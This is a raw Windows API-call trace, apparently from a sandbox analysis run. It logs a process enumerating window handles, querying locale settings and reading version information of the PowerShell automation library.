	[0550.345] GetWindowThreadProcessId (in: hWnd=0x1081c, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1990
	[0550.345] GetWindowThreadProcessId (in: hWnd=0x10812, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1984
	[0550.345] GetWindowThreadProcessId (in: hWnd=0x1080c, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x197c
	[0550.345] GetWindowThreadProcessId (in: hWnd=0x10808, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1978
	[0550.345] GetWindowThreadProcessId (in: hWnd=0x107e4, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1824
	[0550.346] GetWindowThreadProcessId (in: hWnd=0x107d0, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1088
	[0550.346] GetWindowThreadProcessId (in: hWnd=0x107c4, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1908
	[0550.346] GetWindowThreadProcessId (in: hWnd=0x107b6, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x18cc
	[0550.346] GetWindowThreadProcessId (in: hWnd=0x1079c, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x18d0
	[0550.346] GetWindowThreadProcessId (in: hWnd=0x10792, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1840
	[0550.346] GetWindowThreadProcessId (in: hWnd=0x10780, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x10c4
	[0550.346] GetWindowThreadProcessId (in: hWnd=0x1077a, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x128c
	[0550.346] GetWindowThreadProcessId (in: hWnd=0x10776, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x16e8
	[0550.346] GetWindowThreadProcessId (in: hWnd=0x204a2, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x16cc
	[0550.346] GetWindowThreadProcessId (in: hWnd=0x10768, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x274
	[0550.347] GetWindowThreadProcessId (in: hWnd=0x10764, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x10e0
	[0550.347] GetWindowThreadProcessId (in: hWnd=0x10760, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x10cc
	[0550.347] GetWindowThreadProcessId (in: hWnd=0x1075c, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x10c0
	[0550.347] GetWindowThreadProcessId (in: hWnd=0x30750, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x10d0
	[0550.347] GetWindowThreadProcessId (in: hWnd=0x1072e, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1198
	[0550.347] GetWindowThreadProcessId (in: hWnd=0x10720, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1080
	[0550.347] GetWindowThreadProcessId (in: hWnd=0x10712, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1074
	[0550.347] GetWindowThreadProcessId (in: hWnd=0x10704, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x106c
	[0550.347] GetWindowThreadProcessId (in: hWnd=0x106cc, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1474
	[0550.347] GetWindowThreadProcessId (in: hWnd=0x106c8, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1414
	[0550.348] GetWindowThreadProcessId (in: hWnd=0x106c6, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xbd0
	[0550.348] GetWindowThreadProcessId (in: hWnd=0x106c2, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x550
	[0550.348] GetWindowThreadProcessId (in: hWnd=0x20370, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xa38
	[0550.348] GetWindowThreadProcessId (in: hWnd=0x202e8, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x16d0
	[0550.348] GetWindowThreadProcessId (in: hWnd=0x20338, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x16d4
	[0550.348] GetWindowThreadProcessId (in: hWnd=0x106b6, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x15bc
	[0550.348] GetWindowThreadProcessId (in: hWnd=0x10690, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x15a0
	[0550.348] GetWindowThreadProcessId (in: hWnd=0x10680, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x159c
	[0550.348] GetWindowThreadProcessId (in: hWnd=0x10670, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1598
	[0550.348] GetWindowThreadProcessId (in: hWnd=0x10660, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1594
	[0550.349] GetWindowThreadProcessId (in: hWnd=0x10650, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1590
	[0550.349] GetWindowThreadProcessId (in: hWnd=0x10640, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x158c
	[0550.349] GetWindowThreadProcessId (in: hWnd=0x10630, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1588
	[0550.349] GetWindowThreadProcessId (in: hWnd=0x1062c, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1584
	[0550.349] GetWindowThreadProcessId (in: hWnd=0x10628, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1580
	[0550.349] GetWindowThreadProcessId (in: hWnd=0x10624, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x157c
	[0550.349] GetWindowThreadProcessId (in: hWnd=0x1061e, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1488
	[0550.349] GetWindowThreadProcessId (in: hWnd=0x10612, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1404
	[0550.349] GetWindowThreadProcessId (in: hWnd=0x1060e, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x11b8
	[0550.349] GetWindowThreadProcessId (in: hWnd=0x105fc, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xbd4
	[0550.350] GetWindowThreadProcessId (in: hWnd=0x105ec, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xe0c
	[0550.350] GetWindowThreadProcessId (in: hWnd=0x105dc, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xd30
	[0550.350] GetWindowThreadProcessId (in: hWnd=0x105c8, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xe70
	[0550.350] GetWindowThreadProcessId (in: hWnd=0x105b8, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x13b8
	[0550.350] GetWindowThreadProcessId (in: hWnd=0x105a8, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xe20
	[0550.350] GetWindowThreadProcessId (in: hWnd=0x1058a, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xe2c
	[0550.350] GetWindowThreadProcessId (in: hWnd=0x1057a, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xe00
	[0550.350] GetWindowThreadProcessId (in: hWnd=0x10576, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xe04
	[0550.350] GetWindowThreadProcessId (in: hWnd=0x10570, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xc94
	[0550.350] GetWindowThreadProcessId (in: hWnd=0x10568, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x13b0
	[0550.351] GetWindowThreadProcessId (in: hWnd=0x10564, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x13ac
	[0550.351] GetWindowThreadProcessId (in: hWnd=0x10560, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x13a8
	[0550.351] GetWindowThreadProcessId (in: hWnd=0x1055a, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1374
	[0550.351] GetWindowThreadProcessId (in: hWnd=0x10552, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x132c
	[0550.351] GetWindowThreadProcessId (in: hWnd=0x10544, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1328
	[0550.351] GetWindowThreadProcessId (in: hWnd=0x1051c, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x12d0
	[0550.351] GetWindowThreadProcessId (in: hWnd=0x1050c, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x12cc
	[0550.351] GetWindowThreadProcessId (in: hWnd=0x104fc, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x12c8
	[0550.351] GetWindowThreadProcessId (in: hWnd=0x104da, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1290
	[0550.351] GetWindowThreadProcessId (in: hWnd=0x104d0, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1218
	[0550.352] GetWindowThreadProcessId (in: hWnd=0x104cc, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1214
	[0550.352] GetWindowThreadProcessId (in: hWnd=0x104ca, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x11ec
	[0550.352] GetWindowThreadProcessId (in: hWnd=0x104c6, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x11e8
	[0550.352] GetWindowThreadProcessId (in: hWnd=0x202b4, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x11cc
	[0550.352] GetWindowThreadProcessId (in: hWnd=0x202b6, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1140
	[0550.352] GetWindowThreadProcessId (in: hWnd=0x104be, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xe6c
	[0550.352] GetWindowThreadProcessId (in: hWnd=0x104ae, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x6e8
	[0550.352] GetWindowThreadProcessId (in: hWnd=0x10490, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xc6c
	[0550.352] GetWindowThreadProcessId (in: hWnd=0x10480, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xf94
	[0550.352] GetWindowThreadProcessId (in: hWnd=0x10470, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xffc
	[0550.352] GetWindowThreadProcessId (in: hWnd=0x10460, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xf74
	[0550.353] GetWindowThreadProcessId (in: hWnd=0x1044e, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xf08
	[0550.353] GetWindowThreadProcessId (in: hWnd=0x10442, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xf0c
	[0550.353] GetWindowThreadProcessId (in: hWnd=0x1043a, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xed8
	[0550.353] GetWindowThreadProcessId (in: hWnd=0x10436, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xe90
	[0550.353] GetWindowThreadProcessId (in: hWnd=0x10432, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xea8
	[0550.353] GetWindowThreadProcessId (in: hWnd=0x10416, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xfa8
	[0550.353] GetWindowThreadProcessId (in: hWnd=0x10412, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xfbc
	[0550.353] GetWindowThreadProcessId (in: hWnd=0x1040e, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xfb8
	[0550.353] GetWindowThreadProcessId (in: hWnd=0x1040a, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xfb4
	[0550.353] GetWindowThreadProcessId (in: hWnd=0x10406, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xfb0
	[0550.354] GetWindowThreadProcessId (in: hWnd=0x10402, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xfac
	[0550.354] GetWindowThreadProcessId (in: hWnd=0x103fe, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xfc0
	[0550.354] GetWindowThreadProcessId (in: hWnd=0x103f0, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xfd0
	[0550.354] GetWindowThreadProcessId (in: hWnd=0x1039a, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xf88
	[0550.354] GetWindowThreadProcessId (in: hWnd=0x1038a, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xf84
	[0550.354] GetWindowThreadProcessId (in: hWnd=0x10382, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xf80
	[0550.354] GetWindowThreadProcessId (in: hWnd=0x1036e, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xde0
	[0550.354] GetWindowThreadProcessId (in: hWnd=0x1036a, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xddc
	[0550.354] GetWindowThreadProcessId (in: hWnd=0x10366, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xdd8
	[0550.354] GetWindowThreadProcessId (in: hWnd=0x10360, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xd34
	[0550.355] GetWindowThreadProcessId (in: hWnd=0x10358, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xd10
	[0550.355] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xd0c
	[0550.355] GetWindowThreadProcessId (in: hWnd=0x800a4, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xc9c
	[0550.355] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xc74
	[0550.355] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xc1c
	[0550.355] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xc08
	[0550.355] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xabc
	[0552.089] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x24c
	[0552.089] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xbb0
	[0552.089] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xbfc
	[0552.089] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xb10
	[0552.090] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x374
	[0552.090] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x368
	[0552.090] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xb28
	[0552.090] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xae8
	[0552.090] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xb14
	[0552.090] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x95c
	[0552.090] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xa8c
	[0552.090] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x46c
	[0552.091] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xb3c
	[0552.091] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xa90
	[0552.091] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xad0
	[0552.091] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xa9c
	[0552.091] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xaa0
	[0552.091] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xb1c
	[0552.091] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x7e0
	[0552.091] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xa74
	[0552.092] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x694
	[0552.092] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xa28
	[0552.092] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x9b0
	[0552.092] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x8d8
	[0552.092] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x940
	[0552.092] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x93c
	[0552.092] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x4ec
	[0552.092] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x150
	[0552.093] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x720
	[0552.093] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x3c4
	[0552.093] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x7d4
	[0552.093] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x6c8
	[0552.093] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xb54
	[0552.093] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xb54
	[0552.093] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xb5c
	[0552.093] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x838
	[0552.094] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x818
	[0552.094] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x5b8
	[0552.094] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x494
	[0552.094] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1ec
	[0552.094] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x440
	[0552.094] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x7e8
	[0552.094] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x730
	[0552.094] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x2c8
	[0552.095] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x31c
	[0552.095] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x330
	[0552.095] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x128
	[0552.095] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x5c8
	[0552.095] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x6f8
	[0552.095] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x358
	[0552.095] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x73c
	[0552.095] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0xb0
	[0552.096] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x250
	[0552.096] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x240
	[0552.096] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x790
	[0552.096] GetWindowThreadProcessId (in: hWnd=0x70110, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x61c
	[0552.096] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x568
	[0552.096] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x538
	[0552.096] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x540
	[0552.096] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x460
	[0552.097] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x79c
	[0552.097] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x4e0
	[0552.097] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x460
	[0552.097] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x778
	[0552.101] WerSetFlags () returned 0x0
	[0552.110] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0552.110] CoTaskMemFree (pv=0x0) 
	[0552.111] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x16dbe8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x16dbe0 | out: pulNumLanguages=0x16dbe8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x16dbe0) returned 1
	[0552.111] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x16dbe8, pwszLanguagesBuffer=0x2c3dd78, pcchLanguagesBuffer=0x16dbe0 | out: pulNumLanguages=0x16dbe8, pwszLanguagesBuffer=0x2c3dd78, pcchLanguagesBuffer=0x16dbe0) returned 1
	[0552.117] CoTaskMemAlloc (cb=0x24) returned 0x24c240
	[0552.117] GetUserDefaultLocaleName (in: lpLocaleName=0x24c240, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0552.117] CoTaskMemFree (pv=0x24c240) 
	[0552.142] CoTaskMemAlloc (cb=0x104) returned 0x1a9d20
	[0552.142] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1a9d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0552.142] CoTaskMemFree (pv=0x1a9d20) 
	[0552.144] CoTaskMemAlloc (cb=0x104) returned 0x1a9d20
	[0552.144] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1a9d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0552.144] CoTaskMemFree (pv=0x1a9d20) 
	[0552.146] CoTaskMemAlloc (cb=0x104) returned 0x1a9d20
	[0552.146] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1a9d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0552.146] CoTaskMemFree (pv=0x1a9d20) 
	[0552.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0552.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0552.157] SetErrorMode (uMode=0x1) returned 0x1
	[0552.157] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x16d860 | out: lpFileInformation=0x16d860*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0552.157] SetErrorMode (uMode=0x1) returned 0x1
	[0552.157] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x16dad0 | out: lpdwHandle=0x16dad0) returned 0x94c
	[0552.159] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c41608 | out: lpData=0x2c41608) returned 1
	[0552.159] VerQueryValueW (in: pBlock=0x2c41608, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16da48, puLen=0x16da40 | out: lplpBuffer=0x16da48*=0x2c416a4, puLen=0x16da40) returned 1
	[0552.160] VerQueryValueW (in: pBlock=0x2c41608, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x16d9b8, puLen=0x16d9b0 | out: lplpBuffer=0x16d9b8*=0x2c41780, puLen=0x16d9b0) returned 1
	[0552.160] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0552.160] CoTaskMemAlloc (cb=0x2e) returned 0x248720
	[0552.160] lstrcpyW (in: lpString1=0x248720, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0552.160] CoTaskMemFree (pv=0x248720) 
